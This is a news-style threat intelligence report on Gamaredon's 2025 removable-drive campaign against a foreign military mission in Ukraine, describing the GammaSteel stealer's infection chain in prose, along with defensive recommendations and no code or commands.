The Russian-affiliated cyber espionage group known as Gamaredon, also referred to as Shuckworm, has been implicated in a cyber attack targeting a foreign military mission stationed in Ukraine. The primary objective of this operation was to deploy an enhanced variant of the GammaSteel malware, a tool designed for information theft.
According to the Symantec Threat Hunter team, the initial signs of this malicious activity emerged on February 26, 2025. The attackers employed an infected removable drive as the entry point to infiltrate the targeted systems. This method underscores the group’s strategic use of physical media to bypass traditional network defenses and establish a foothold within secure environments.
Infection Mechanism and Execution Chain
The attack commenced with the creation of a Windows Registry value under the UserAssist key. This was followed by the execution of mshta.exe via explorer.exe, initiating a multi-stage infection process that deployed two critical files:
1. NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms: This file facilitated communication with the command-and-control (C2) server. The malware retrieved the C2 server’s address by accessing specific URLs associated with legitimate services such as Teletype, Telegram, and Telegraph. This technique of leveraging trusted platforms for C2 communication is a hallmark of Gamaredon’s approach, complicating detection efforts.
2. NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms: Designed to propagate the infection, this file targeted removable and network drives. It created shortcut files for each folder, executing the malicious mshta.exe command while concealing its presence. This method ensures the malware’s persistence and facilitates its spread across connected systems.
On March 1, 2025, the malware executed a script to contact the C2 server, exfiltrate system metadata, and receive a Base64-encoded payload. This payload initiated a PowerShell command to download an obfuscated version of the original script, perpetuating the infection cycle.
Advanced Reconnaissance and Data Exfiltration
The updated script connected to a hard-coded C2 server to retrieve two additional PowerShell scripts:
1. Reconnaissance Utility: This tool performed comprehensive system surveillance, including capturing screenshots, executing the systeminfo command, identifying active security software, enumerating files and folders on the Desktop, and listing running processes. Such extensive reconnaissance enables attackers to assess the system’s defenses and identify valuable data.
2. Enhanced GammaSteel Malware: An improved version of the known information stealer, this malware exfiltrated files from the victim’s system based on a predefined list of file extensions, focusing on data within the Desktop and Documents folders. The targeted file types often include sensitive documents, spreadsheets, and other critical information.
Implications and Tactical Evolution
This incident signifies a notable advancement in Gamaredon’s operational tactics. Historically perceived as less sophisticated compared to other Russian cyber actors, Gamaredon compensates through relentless targeting of Ukrainian entities. The group’s continuous refinement of its code, incorporation of obfuscation techniques, and utilization of legitimate web services for C2 communication reflect a concerted effort to evade detection and enhance operational effectiveness.
The strategic use of infected removable drives highlights the persistent threat posed by physical media as vectors for cyber attacks. Organizations, particularly those handling sensitive information, must implement stringent security protocols to mitigate such risks. These measures include disabling autorun features, conducting regular scans of removable media, and educating personnel on the dangers of connecting unverified devices to secure systems.
In conclusion, Gamaredon’s latest campaign underscores the evolving landscape of cyber threats and the necessity for continuous vigilance and adaptation in cybersecurity practices. The group’s ability to innovate and adapt its methods serves as a stark reminder of the challenges faced in defending against state-sponsored cyber espionage activities.
